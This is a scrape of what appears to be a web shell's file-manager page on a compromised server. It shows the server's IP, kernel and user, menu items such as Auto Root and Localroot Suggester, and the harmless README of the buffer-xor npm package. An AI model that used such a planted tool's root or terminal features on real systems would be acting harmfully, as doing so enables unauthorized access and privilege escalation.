Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.137.185.239
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
buffer-xor /
Delete
Unzip
Name
Size
Permission
Date
Action
test
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.npmignore
13
B
-rw-r--r--
2015-09-25 05:11
.travis.yml
165
B
-rw-r--r--
2015-09-25 05:11
LICENSE
1.06
KB
-rw-r--r--
2015-09-25 05:11
README.md
1014
B
-rw-r--r--
2015-09-25 07:13
index.js
206
B
-rw-r--r--
2015-09-25 05:11
inline.js
38
B
-rw-r--r--
2015-09-25 07:13
inplace.js
186
B
-rw-r--r--
2015-09-25 07:13
package.json
1.46
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
# buffer-xor [](http://travis-ci.org/crypto-browserify/buffer-xor) [](https://www.npmjs.org/package/buffer-xor) [](https://github.com/feross/standard) A simple module for bitwise-xor on buffers. ## Examples ``` javascript var xor = require("buffer-xor") var a = new Buffer('00ff0f', 'hex') var b = new Buffer('f0f0', 'hex') console.log(xor(a, b)) // => <Buffer f0 0f> ``` Or for those seeking those few extra cycles, perform the operation in place: ``` javascript var xorInplace = require("buffer-xor/inplace") var a = new Buffer('00ff0f', 'hex') var b = new Buffer('f0f0', 'hex') console.log(xorInplace(a, b)) // => <Buffer f0 0f> // NOTE: xorInplace will return the shorter slice of its parameters // See that a has been mutated console.log(a) // => <Buffer f0 0f 0f> ``` ## License [MIT](LICENSE)